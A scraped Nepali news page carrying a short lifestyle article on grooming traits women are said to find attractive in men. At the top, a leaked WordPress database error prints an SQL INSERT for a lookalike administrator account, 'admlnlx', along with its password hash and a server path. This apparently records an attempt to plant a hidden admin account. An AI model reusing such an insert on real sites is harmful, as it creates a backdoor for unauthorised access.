WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiH20o.8QrVwug1mWtkAL47B.eQj1C/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 15:34:28', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
यस्ता पुरुषहरुप्रति आकर्षित हुन्छन महिलाहरु – Gaule Khabar

यस्ता पुरुषहरुप्रति आकर्षित हुन्छन महिलाहरु

यस्ता पुरुषहरुप्रति आकर्षित हुन्छन महिलाहरु

एजेन्सी-

अधिकांश महिलाहरु पुरुषको तुलनामा धेरै नै आफ्नो स्वास्थ्य र सुन्दरतामा ध्यान दिन्छन । साथै उनीहरु पुरुषहरुमा पनि यस्तै गुण मन पराउँछन् । यसका लागि पुरुषहरुले पनि आफ्नो स्वास्थ्यको हेरचाह गर्नु जरुरत हुन्छ । मनोवैज्ञानिकका अनुसार महिलाहरु पुरुषको यी कुरामाथि विशेष ध्यान राख्छन् ।

१. महिलाहरु यस्ता पुरुषहरुलाई ध्यान दिन्छन् जो दिनहुँ नुहाउँछन् ,आफ्नो सरसफाईमा विशेष ध्यान दिन्छन् ।

२. महिलाहरु सफा तथा चमकदार दाँतका साथै राम्रो मुस्कान भएको पुरुषहरु मन पराउँछन् ।

३. महिलाहरु लामो, बाक्लो तथा सिल्की कपाल भएका पुरुष मन पराउँछन् ।

४.अल्छी जस्ता देखिने पुरुष भन्दा इस्टामिना बढी भएका र जो काम फुर्तिसँग गर्न सक्छ, महिलाहरु त्यस्ता पुरुषहरु मन पराउँछन् ।

५.महिलाहरु अनुहार क्लियर पुरुष भएको मन पराउँछन् । उनीहरु कुनै दाग नभएको तथा डण्डीफोर, चाँयापोतो भएको मन पराउँदैनन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका